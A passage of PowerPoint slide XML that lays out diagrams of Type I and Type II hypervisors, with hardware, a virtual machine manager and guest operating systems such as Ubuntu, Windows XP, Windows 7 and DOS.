                <a:lnTo>
                  <a:pt x="0" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5621019" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5664659" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5703861" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5737066" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5762714" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5779246" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5785104" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5785104" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5779246" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5762714" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5737066" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5703861" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5664659" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5621019" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EE636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908540" y="2868548"/>
            <a:ext cx="413639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90">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ty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2200" spc="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II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hyperviso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7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(host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base</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d)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75070" y="1780793"/>
            <a:ext cx="370332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w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type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y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per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v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e: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02714" y="7539990"/>
            <a:ext cx="5834380" cy="759460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="45535F"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="42709B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600" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Hardware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29383" y="3656076"/>
            <a:ext cx="5834380" cy="3775075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004D7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275"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-2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1600" spc="-1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1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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1600" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ng</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="16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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Sy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-3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1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>te</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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12848" y="3924300"/>
            <a:ext cx="5276215" cy="2677795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="007B9E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00">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1270">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Hypervisor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98776" y="4090415"/>
            <a:ext cx="1426845" cy="89154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191135" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="275590" marR="266065" indent="78740">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1505"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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82796" y="4090415"/>
            <a:ext cx="1426845" cy="89154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191135" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="274955" marR="125730" indent="-140335">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1505"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Wi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-85">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>XP  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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66815" y="4090415"/>
            <a:ext cx="1426845" cy="89154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191135" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="274955" marR="187960" indent="-79375">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1505"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Wi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-85">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-70">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>7  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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98776" y="5184647"/>
            <a:ext cx="1426845" cy="89344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70485" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="274955" marR="266065" indent="-635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Wi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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082796" y="5184647"/>
            <a:ext cx="1426845" cy="89344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192405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1515"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>DOS</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1270">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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766815" y="5184647"/>
            <a:ext cx="1426845" cy="89344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192405" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="196215">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1515"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Win</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-85">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-100">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274955">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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045702" y="7539990"/>
            <a:ext cx="5834380" cy="759460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="45535F"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="42709B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Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Hardware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355835" y="3924300"/>
            <a:ext cx="2045335" cy="2856230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="007B9E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Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="622300" marR="257810" indent="-315595">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Virtua</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-2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16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15">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Machi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Manager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072371" y="3656076"/>
            <a:ext cx="5834380" cy="3775075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004D7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600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Hypervisor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287756" y="5945123"/>
            <a:ext cx="1426845" cy="81534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153670" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="275590" marR="266065" indent="78740">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1210"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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667743" y="3924300"/>
            <a:ext cx="1428115" cy="80518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147955" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="276225" marR="126364" indent="-140335">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1165"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Wi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-85">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>XP  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
